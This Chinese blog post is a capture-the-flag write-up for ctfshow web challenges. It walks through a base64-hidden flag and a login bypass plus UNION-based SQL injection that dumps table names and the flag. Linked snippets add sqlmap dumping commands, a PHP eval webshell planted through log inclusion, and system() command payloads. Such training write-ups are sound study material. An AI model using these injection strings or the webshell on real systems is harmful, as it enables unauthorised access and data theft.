ctfshow刷题-web签到题,web2

最新推荐文章于 2024-01-19 16:56:14 发布
最新推荐文章于 2024-01-19 16:56:14 发布
阅读量545 收藏 2
点赞数
分类专栏: CTF-WEB 文章标签: 数据库 sql web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52011198/article/details/129145870
版权

web签到题

打开题目,只有一句话
在这里插入图片描述
查看源码,发现有一段注释
在这里插入图片描述
注释很像base64编码,解码后得到flag
在这里插入图片描述

web2

题目中有两个输入框,试试有没有注入点
在这里插入图片描述
尝试万能密码’or 1=1
成功登录
在这里插入图片描述
可以继续尝试联合注入,先查回显位置
从’ or 1=1 union select 1, #开始
在’or 1=1 union select 1,2,3 # 时查到回显位置为2
在这里插入图片描述
接下来查询表名
'or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=database() #
在这里插入图片描述
去flag表中查询字段名,离flag已经很近了
’ or 1=1 union select 1, column_name,3 from information_schema.columns where table_name=‘flag’ #
在这里插入图片描述
查询到字段名也是flag,直接在字段中查flag
’ or 1=1 union select 1,flag,3 from flag #
在这里插入图片描述
大功告成!

l0v3m1ng
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 】web 通关 1.0
人若无名,便可专心练剑
03-25 973
打开目链接,一看就是一道文件包含的PHP伪协议目,但是这里我们必须得判断使用什么伪协议,我开始使用的是filter伪协议,确实可以执行,但是有个尴尬的问,就是不知道读谁,那个flag文件不知道,我开始尝试了flag.php,但是没用,/etc/passwd都出来了。这里经过测试,发现存在空格过滤了,我们利用/**/进行绕过空格,会发现页面发生了变化,说明绕过成功,并且确实存在sql注入,那么我们这里还是跟前面的目一样,利用union联注入。基本的原理是这样的,但更严谨的字符串格式是,
CTFshow WEB web签到
Y1da的博客
04-19 947
CTFshow WEB web签到 进入环境后F12查看源代码 where is flag? <!-- Y3Rmc2hvd3tiM2ZkZDFlMS03N2E5LTQ5MmMtOWI2Ny1jM2FjMzliNmVhY2R9--> 怀疑注释是base64编码,尝试解码,得到flag ctfshow{b3fdd1e1-77a9-492c-9b67-c3ac39b6eacd} ...
CTFshow-web -入门签到
pone2233的博客
12-15 1441
CTFshow Web web签到 F12 web2 先抓包然后按照流程跑 把之前抓取的数据复制到sqlmap根目录下test.txt内 保存完成后开始跑数据库名 python2 sqlmap.py -r test.txt --dbs 跑数据库内数据表 python2 sqlmap.py -r test.txt -D web2 --tables 查看字段 python2 sqlmap.py -r test.txt -D web2 -T flag --columns [ 查询字段内容 p
ctfshow-web签到
FY_13_14的博客
11-18 1684
ctf-show web签到
CTFshow-菜狗杯-web签到
qq_31415417的博客
12-06 3163
CTFshow参数传递的获取、url编码、eval命令执行 解思路 先是cookie传参再是POST传参再是GET传参再是REQUEST传参最后是eval命令执行分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016构造payload 得到flag
CTFSHOW 签到
MrTreebook的博客
12-05 1033
CTFSHOW 萌新赛 签到1.目下载地址2. checksec检查保护3.IDA分析4.构造ROP链4.exp 1.目下载地址 点击下载目 2. checksec检查保护 堆不可执行 3.IDA分析 看到了gets()函数,很明显存在溢出 需要知道64位系统和32位系统的区别 64 位系统传参从第一个到第六个依次保存在rdi,rsi,rdx,rcx,r8,r9 从第7个参数开始,接下来的所有参数都才通过栈传递 4.构造ROP链 我们需要找到适的 gadgets,利用 ROPgadget a
LCTF#LCTF2017#web签到1
07-25
web签到目不难, 一共就只有几个点用file协议读取本地文件截断url后面拼接的/, GET请求, 用?#都可以payload其实很简单: file://
基于Python的Web考勤系统设计源码
最新发布
04-08
Web考勤系统:基于Python开发,包含70个文件,包括19个HTML文件、10个Python源文件、9个JavaScript...该项目是一个Web考勤系统,旨在为用户提供一个便捷的考勤管理平台,包括员工签到、考勤记录查询、考勤统计等功能。
Python django框架开发发布会签到系统(web开发)
09-17
主要介绍了Python django框架开发发布会签到系统(web开发),本文通过实例代码效果展示截图的形式给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
微信小程序源码-蝌蚪签到.zip
03-24
微信小程序源码-蝌蚪签到.zip微信小程序源码-蝌蚪签到.zip微信小程序源码-蝌蚪签到.zip微信小程序源码-蝌蚪签到.zip微信小程序源码-蝌蚪签到.zip微信小程序源码-蝌蚪签到.zip微信小程序源码-蝌蚪签到.zip微信小程序...
学生上课签到系统源码+项目说明(手机web app).zip
02-21
学生上课签到系统源码+项目说明(手机web app).zip学生上课签到系统源码+项目说明(手机web app).zip学生上课签到系统源码+项目说明(手机web app).zip学生上课签到系统源码+项目说明(手机web app).zip学生上课签到系统...
CTF show----web笔记(web签到~web6)
weixin_45908624的博客
11-22 3619
web签到~web6 解笔记
CTF-练习平台-WEB签到
weixin_30567225的博客
12-20 1255
一、签到 根据提示直接加群在群公告里就能找到~ 转载于:https://www.cnblogs.com/Yuuki-/p/8075945.html
CTFShow-WEB(签到~5) WP
PP Jun的博客
08-01 896
[ctf.show]签到_观己
Rabbit_Gray的博客
08-16 803
进入目,显示了源码,其中对于file参数中检测是否包含php字符串,大小写不敏感。 所以伪协议 php://input 等无法使用 测试了一下data://伪协议,结果显示目标服务器配置中关闭了这个伪协议 从服务器返回的响应头中可以知道服务器是nginx服务器 nginx服务器的访问日志文件路径是/var/log/nginx/access.log 尝试包含了一下日志文件,成功 访问日志文件记录了服务器收到的每一次请求的 IP、访问时间、URL、User-Agent,这4..
ctfshow web
m0_73239569的博客
03-04 824
记录刷题
ctfshow-web
qq_43618536的博客
07-15 669
ctfshow-web
ctfshow-WEB AK赛-签到_观己
博客地址 www.sec0nd.top
02-25 2474
文章目录目分析解过程 目分析 打开网页 正则匹配过滤了php,且大小写不敏感 allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解过程 ?file=/var/log/nginx/access.log 发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话 在UA中添加一句话木马 <?php eval($_POST[1]);?> 在POST中令1=system('ls /');查看根目录中的文件 发现有个flag.txt 这里应该就是fl
ctfshow菜狗杯-web签到 详细解过程
a_153161的博客
01-19 875
ctfshow 菜狗杯web签到详细解体过程
ctfshow web签到
09-12
ctfshow-web中的"web签到"是其中的一道目。具体信息如下: 请注意,网站的内容中包含了一个URL:/?url=data://text/plain,<?php system("cat ctf_go_go_go"); ?> 。这个URL可能与web签到有关。 此外,网站中还包含了一个meta标签:<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 。这个标签指定了网页的字符编码格式。 综上所述,您可以尝试访问ctfshow-web,并查找与web签到相关的内容。您可以注意URL和meta标签中的信息,这可能有助于解决这道目。祝您好运!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值